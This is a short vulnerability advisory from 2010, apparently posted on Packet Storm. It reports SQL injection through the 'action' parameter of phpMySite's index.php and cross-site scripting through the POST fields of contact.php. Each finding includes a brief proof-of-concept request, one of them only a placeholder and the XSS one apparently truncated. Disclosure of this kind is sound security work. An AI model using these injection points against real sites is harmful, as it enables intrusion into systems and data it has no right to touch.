phpMySite suffers from cross site scripting and remote SQL injection vulnerabilities.
ec6af75bfa56f883d469987c1138b67f
=================================================================
[~] phpMySite (XSS/SQLi) Multiple Remote Vulnerabilities
=================================================================
##########################################################
## Author: Crux
## Homepage: http://hack-tech.com
## Date: 2-27-2010
## Software Link: http://www.phpmysite.com/
## Version: N/A
##########################################################
[ SQLi ]
---------------------------------
// This vulnerability affects index.php
// Can be exploited VIA the GET variable 'action'
[#] Exploit / POC
index.php?action=${SQLINJECTIONHERE}&key=111-222-1933email@address.tst
[ XSS ]
---------------------------------
// This vulnerability affects contact.php
// Can be exploited via the following POST variables:
// name, city, email, state, message
[#] Exploit / POC
name=Crux&city=1>">&state=NY&email=sample%40email%2Etst&message=111-222-1933email@address.tst&word=111-222-1933email@address.tst
=================================================================
________________________________
Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!